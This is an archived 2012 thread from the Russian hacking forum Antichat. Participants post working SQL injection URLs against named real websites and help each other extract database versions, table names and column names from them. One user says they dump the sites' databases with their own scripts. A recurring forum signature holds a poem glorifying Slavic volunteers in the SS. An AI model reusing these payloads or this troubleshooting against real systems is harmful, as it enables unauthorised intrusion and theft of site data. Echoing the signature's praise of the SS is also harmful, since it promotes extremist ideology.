ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

24.03.2012, 21:30
|
|
Guest
Сообщений: n/a
Провел на форуме: 102354
Репутация:
267
|
|
http://www.jewish.donetsk.ua/stat.php?topic=news&page=74&id=1404-9999.9+union+select+1,2,3,4,table_name,6,7,8,9,10, 11+from+information_schema.tables+limit+0,1--+d
Конечно, limit 0,0 сделал.
|
|
|
|

24.03.2012, 21:33
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме: 4358210
Репутация:
2017
|
|
http://venec.ulstu.ru/lib/go.php?id=21511111111111+UNION+SELECT+1,2,3,4,5,6, 7,8,9,unhex%28hex%28version%28%29%29%29,11,12,13,1 4,15,16,17,18,19,20,21,22--
Сообщение от None
Файл ./4.1.2-alpha не найден.
не?
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|

24.03.2012, 21:51
|
|
Guest
Сообщений: n/a
Провел на форуме: 344922
Репутация:
75
|
|
Сообщение от HAXTA4OK
HAXTA4OK said:
http://venec.ulstu.ru/lib/go.php?id=21511111111111+UNION+SELECT+1,2,3,4,5,6, 7,8,9,unhex%28hex%28version%28%29%29%29,11,12,13,1 4,15,16,17,18,19,20,21,22--
не?
ну ты и мозг)))
а тут
http://www.fanfics.ru/read.php?id=3&chapter=-616'
ошибка есть, что не подставлю она пропадает, как быть?
|
|
|
|

24.03.2012, 22:06
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме: 4358210
Репутация:
2017
|
|
Сообщение от Ruslan1817
Ruslan1817 said:
http://www.fanfics.ru/read.php?id=3&chapter=-616'and(select*from(select(name_const(version(),1) ),name_const(version(),1))a)and(1)='1
https://rdot.org/forum/showthread.php?t=60&page=2
какой там вывод? или я в шары долблюсь?
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|

24.03.2012, 22:15
|
|
Guest
Сообщений: n/a
Провел на форуме: 45774
Репутация:
26
|
|
Сообщение от HAXTA4OK
HAXTA4OK said:
какой там вывод? или я в шары долблюсь?
норм. вывод '5.1.45'
|
|
|
|

24.03.2012, 23:34
|
|
Guest
Сообщений: n/a
Провел на форуме: 344922
Репутация:
75
|
|
Сообщение от smirk
smirk said:
норм. вывод '5.1.45'
чёт непойму где ты там вывод нашол? у меня как небыло так и нету
|
|
|
|

24.03.2012, 23:39
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме: 168709
Репутация:
1
|
|
Пробелы постирайте))
Сообщение от None
Продажа любых мобильных телефонов Samsung в интернет-магазине SotMarketERROR: 1060 - Duplicate column name '
5.1.45
'
SELECT * FROM saled_links WHERE uri = '/read.php?id=3&chapter=-616'and(select*from(select(name_const(version(),1) ),name_const(version(),1))a)and(1)='1'
Выбор ссылки
|
|
|

24.03.2012, 23:41
|
|
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
Провел на форуме: 7879791
Репутация:
265
|
|
Сообщение от qaz
qaz said:
чёт непойму где ты там вывод нашол? у меня как небыло так и нету

|
|
|

25.03.2012, 00:01
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме: 5386281
Репутация:
1177
|
|
Сообщение от qaz
qaz said:
чёт непойму где ты там вывод нашол? у меня как небыло так и нету
Потому что скуля там не в GET-параметре, а в URI:
http://www.fanfics.ru/read.php?id=3&'and(select*from(select(name_const(v ersion(),1)),name_const(version(),1))a)and(1)='1
Посмотри внимательно на запрос, а вывод все-ровно есть, магия!!11
А ты, судя по всему, юзаешь FF, который урлэнкодит запросы. Используй другой браузер, или ставь патч для FF (https://rdot.org/forum/showthread.php?t=1403)
|
|
|

25.03.2012, 00:46
|
|
Guest
Сообщений: n/a
Провел на форуме: 344922
Репутация:
75
|
|
Сообщение от Tigger
Tigger said:
Потому что скуля там не в GET-параметре, а в URI:
http://www.fanfics.ru/read.php?id=3&'and(select*from(select(name_const(v ersion(),1)),name_const(version(),1))a)and(1)='1
Посмотри внимательно на запрос, а вывод все-ровно есть, магия!!11
А ты, судя по всему, юзаешь FF, который урлэнкодит запросы. Используй другой браузер, или ставь патч для FF (https://rdot.org/forum/showthread.php?t=1403)
точняк, в опере норм открывает, единственная трабла, я сливаю базы через свои php скрипты, и они также как и фф нехотят выодить как нужно, мб есть какое решение?
и сразу ещо вопрос, таблицы выводит нормально, колонки нехочет
http://kinoad.ru/robots/prosmotr/index.php?id=1908%27+limit+0,0+union+select+1,2,3, 4,5,6,7,8,9,10,11,column_name,13,14,15,16,17,18,19 ,20,21+from+information_schema.columns+where+limit +0,1--+
как их вывести?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|